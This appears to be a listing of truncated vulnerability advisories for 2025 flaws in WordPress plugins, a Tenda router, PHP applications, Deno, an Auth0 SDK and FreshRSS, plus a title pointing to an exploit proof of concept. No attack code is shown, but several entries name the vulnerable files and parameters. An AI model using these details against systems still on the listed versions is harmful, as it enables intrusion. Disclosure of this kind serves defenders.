PT-2025-24132 · Unknown · Email Subscribe Form

Name of the Vulnerable Software and Affected Versions: Elastic Email Subscribe Form versions 1.2.2 and earlier Description: The issue is related to a Missing Authorization vulnerability in the Elastic Email Subscribe Form, which allows exploitation due to incorrectly configured access control...

PT-2025-24398 · Tenda · Tenda Ac5

Name of the Vulnerable Software and Affected Versions: Tenda AC5 version 15.03.06.47 Description: A critical issue was found, classified as critical, affecting the function formSetRebootTimer of the file /goform/SetRebootTimer. The manipulation of the argument rebootTime leads to a stack-based...

PT-2025-24071 · Unknown · Code-Projects Traffic Offense Reporting System

Name of the Vulnerable Software and Affected Versions: code-projects Traffic Offense Reporting System version 1.0 Description: A issue was found in the code-projects Traffic Offense Reporting System, affecting some unknown functionality of the file /save-reported.php. The manipulation of the...

PT-2025-24040 · WordPress · Runners Log

Name of the Vulnerable Software and Affected Versions: Runners Log plugin for WordPress versions up to, and including, 3.9.2 Description: The issue is related to Stored Cross-Site Scripting via the plugin's 'runnerslog' shortcode due to insufficient input sanitization and output escaping on...

PT-2025-24031 · WordPress · Wp Online Users Stats

Name of the Vulnerable Software and Affected Versions: WP Online Users Stats plugin for WordPress versions up to and including 1.0.0 Description: The issue allows authenticated attackers with Editor-level access or higher to inject additional SQL queries into existing ones, potentially extracting...

PT-2025-24054 · Apache · Apache

Name of the Vulnerable Software and Affected Versions: Apache versions prior to the fixed version Description: A missing protection against path traversal allows access to any file on the server. This issue affects the Apache software, allowing unauthorized access to files. Recommendations: For...

PT-2025-24015 · Sourcecodester · Sourcecodester Student Management System

Name of the Vulnerable Software and Affected Versions: SourceCodester Student Result Management System version 1.0 Description: A vulnerability was found in the Subjects Page component, specifically in an unknown function of the file /script/academic/subjects. The manipulation of the Subject...

PT-2025-24216 · Sergiotrinity · Trinity Audio

Name of the Vulnerable Software and Affected Versions: sergiotrinity Trinity Audio versions through 5.20.0 Description: The issue is related to a Missing Authorization vulnerability, which allows exploitation of incorrectly configured access control security levels. Recommendations: For versions...

CVE-2025-48999

DataEase is an open source business intelligence and data visualization tool. A bypass of CVE-2025-46566's patch exists in versions prior to 2.10.10. In a malicious payload, getUrlType retrieves hostName. Since the judgment statement returns false, it will not enter the if statement and will not ...

CVE-2025-49000

InvenTree is an Open Source Inventory Management System. Prior to version 0.17.13, the skip field in the built-in label-sheet plugin lacks an upper bound, so a large value forces the server to allocate an enormous Python list. This lets any authenticated label-printing user trigger a...

Exploit for CVE-2025-49113

CVE-2025-49113 PoC Repository Overview of CVE-2025-49113 C...

Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor

Summary Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network. Details Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code...

PT-2025-23935 · Unknown · Freefloat Ftp Server

Name of the Vulnerable Software and Affected Versions: FreeFloat FTP Server version 1.0 Description: A critical issue affects the RESTART Command Handler component, leading to a buffer overflow. This can be exploited remotely. The issue has been publicly disclosed. Recommendations: For FreeFloat...

PT-2025-23928 · Unknown · Phpgurukul Complaint Management System

Name of the Vulnerable Software and Affected Versions: PHPGurukul Complaint Management System version 2.0 Description: A critical issue has been found in the PHPGurukul Complaint Management System, affecting some unknown functionality of the file /user/register-complaint.php. The manipulation of...

PT-2025-23926 · Joomla · Rsmail!

Name of the Vulnerable Software and Affected Versions: RSMail! component versions 1.19.20 through 1.22.26 for Joomla Description: A stored XSS issue was discovered in the RSMail! component for Joomla, where user-supplied input is not properly sanitized before being stored and rendered within the...

PT-2025-23915 · Unknown · Phpgurukul Complaint Management System

Name of the Vulnerable Software and Affected Versions: PHPGurukul Complaint Management System version 2.0 Description: A critical issue was found in the PHPGurukul Complaint Management System, affecting some unknown functionality of the file /admin/edit-state.php. The manipulation of the...

PT-2025-23905 · Radare2 · Radare2

Name of the Vulnerable Software and Affected Versions: Radare2 version 5.9.9 Description: A vulnerability was found in Radare2 and classified as problematic. This issue affects the function r cons context break pop in the library /libr/cons/cons.c of the component radiff2. The manipulation of the...

CVE-2025-48935

Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 2.2.0 and prior to versions 2.2.5, it is possible to bypass Deno's permission read/write db permission check by using ATTACH DATABASE statement. Version 2.2.5 contains a patch for the issue...

CVE-2025-48947 NextJS-Auth0 SDK Vulnerable to CDN Caching of Session Cookies

The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. In Auth0 Next.js SDK versions 4.0.1 through 4.6.0, session cookies set by auth0.middleware may be cached by CDNs due to missing Cache-Control headers. Three preconditions must be met in order for...

CVE-2025-31136

FreshRSS before 1.26.2 is vulnerable to a cross-site scripting (XSS) issue in f.php triggered by SVG favicons downloaded from attacker-controlled feeds. The XSS occurs when the favicon contains unsanitized [removed] tags and the page lacks a Content Security Policy; an attacker can embed a malici...